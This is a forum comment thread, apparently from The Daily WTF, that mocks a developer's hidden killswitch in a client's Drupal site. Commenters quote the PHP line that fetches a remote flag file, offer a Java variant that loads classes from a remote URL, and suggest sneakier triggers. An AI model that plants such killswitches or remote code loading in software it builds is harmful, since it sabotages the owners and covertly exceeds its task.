- Feature Articles
- CodeSOD
- Error'd
-
Forums
-
Other Articles
- Random Article
- Alex's Soapbox
- Announcements
- Best of…
- Best of Email
- Best of the Sidebar
- Bring Your Own Code
- Coded Smorgasbord
- Mandatory Fun Day
- Off Topic
- Representative Line
- News Roundup
- Editor's Soapbox
- Software on the Rocks
- Souvenir Potpourri
- Sponsor Post
- Tales from the Interview
- The Daily WTF: Live
- Virtudyne
Admin
He was probably thinking "Maybe I needing later". Possibly the same guy, to boot.
Also, fr1st!!!1111eleven
Admin
He's not the frist to do something like that.
Admin
It's refreshing for a change to see a developer using Hungarian notation in his name but not his code.
Admin
OMG, that's not only really bad code, that's a backdoor. Loading code from remote server and "eval"uating it is worst practice ever...
1st php-lesson: eval() is evil() 2nd php-lesson: Never use eval() etc...
Captcha acsi
Admin
Markeiting + sholders = missing spell check.
Admin
We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used. I really wanna smack the original developer. Not for the killswitch, not even for eval(), but for wrapping a variable declaration in a useless method call.
CAPTCHA: uxor. Uber XOR. 1 UXOR 2 = 2
Admin
uhoh someone is on to the clue
Admin
I don't think much of the obfuscation of the guilty URL. (Select the text...)
Admin
This is SOP for UK MOD redaction, I see nothing wrong with it.
Admin
This can be done with URL clasloder in Java.
try { URL url = new URL("http://www.synerzip.com/employees?empId=8847"); Class resolve = URLClassloader.newInstance(url).loadClass(); } catch (Throwable ex) { System.exit(0); }Admin
If we'd revoke the programming license of people building such killswitches, the world would be a better place.
Then again, if there were programming licenses, most of this crap could be prevented in the first place...
Admin
Isn't drupal just one big backdoor?
Admin
Admin
really? I found it very amusing...
Admin
All have licenses. Government issued paperwork does not guarantee competence.
Admin
mysql_drop_db ("marketingCMS");Or he could just install a rootkit. Evil in any way.
Admin
If you are going to have programming licenses, then you need to have programming police as well, who patrol your source code, and write you $175 tickets.
Admin
Before anyone gets excited -
I suspect that the domain name is fake and that the "obfuscation" used was a dig at the UK MOD.
Admin
TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that. It makes it much more difficult to realize, and is much funnier in the long term.
Admin
Admin
Initrode is an Office Space reference
Admin
Admin
It used to be common practice to use eval to catch (and ignore) any errors. If file_get_contents failed for any reason (like that function being disabled) the code silently eats that fail. I suspect this code was written before PHP 5 introduced try / catch.
Admin
Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.
I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...
Admin
TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?
Admin
"Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel
"Worse Than February" for weathermen
"Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts
"Worse Than Furtrapping" for government registered animal rights liberationists
Admin
Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.
Admin
TRWTF is RGB(0,0,0)
Like seriously, you can't just use the native: "#000"?
Admin
Admin
Worst idea ever. I love it.
Admin
Sad thing is, he really had potential as an evil genius, disguising a full-blown backdoor as a simple killswitch that even half of the commenters here fell for, and then making such a simple mistake.
Admin
This Nagesh is obviously a fake; note the correct English and grammar on all of it's posts. The real Nagesh writes in Hinglish.
Admin
wasn't that hard to see. if your eval followed by a url ... red flags and loud klaxon alarms should be going off
Admin
Admin
The code hacked directly into the Drupal core; if the Drupal installation ever got updated (ie if a security patch was released), installing the update would have wiped out the hack. (and any other hacks lurking in the core)
The eval() is completely aritrary. The @ sign at the start of the code blocks any error reporting from that line, and there's no dynamic content in the eval().... really no idea why he used eval() for this at all. It would have worked exactly the same without it.
It's not just the firewall that could have blocked this from working. PHP has a config setting that will prevent file_get_contents() from loading remote URLs. This setting is generally recommended to be enabled for security reasons, so the code given wouldn't work on a default PHP installation, regardless of the firewall setting.
The "strangely out of place line" seems to be missing from the original post. I assume it's a function call that leads to the eval() line?
Admin
Admin
Run this and see what happens.
eval( $test = "echo 'wooooooo';" );
The assignment statement is evaluated as an expression, which evaluates to the contents of the assignment.
Admin
I know Runescape did (still doing?) something like this, except instead of using a URLClassLoader, they simply made their own and verified that the external code they were loading was of the correct size. This meant that if you put the runescape applet and your own on the same web page you could trick it into loading different code instead and compromise someone's computer if they (previously) choose to always trust runescape applets just by having them visit a web site. Can't do this anymore due to changing an Applet's stub require a security permission if it isn't already set.
Admin
I thought the P in LAMP was Perl/Python/PHP, all depending on what flavor you wanted?
Admin
Admin
Because that's what it stands for! "P" can stand for Perl, PHP, or Python; although, I mostly use it in reference to PHP.
Admin
Admin
Drupal has a couple of good core backdoors for this use case: probably the best is that users can create their own accounts in the default install. So instead of looking for a file on his own server, he could have looked for a user on the drupal instance with a distinct name.
If user "fhqwhgads" exists, then do whatever...
Admin
Admin
Admin
FTFY.
Admin
He sust have spent too much time working on the project and not enough time on the killswitch.
Best have another (seemingly unsabotaged ) application look for the internet kill-flag and just store it and then have the sabotaged app look that up in the unsabotaged system.
Admin
So when it's done in on the web in PHP, we call it a malicious backdoor. Developers who use it are unethical.
If it's done on the desktop, mobile platform, or video game console, we call it DRM and it's illegal (in the United States anyway) to circumvent. Developers cherish it, thinking it will stop piracy (HA!)
What a messed up world...
Admin
Why does everyone think this is a backdoor? Maybe it will be easier to see if it's formatted:
eval( @$enabled = trim(file_get_contents("http://initrode-global.com/rg_initrode.txt")); if(!$enabled) exit; )
For one thing, eval() expects a string argument--not PHP code--so this won't even run. And even if the code inside the eval() were run, it would not evaluate the contents of the remote file! It would just assign the contents to $enabled.
Admin
Java at least has SecurityManager classes. You can sandbox your JVM. For example, the Java SQL stored procedures do so.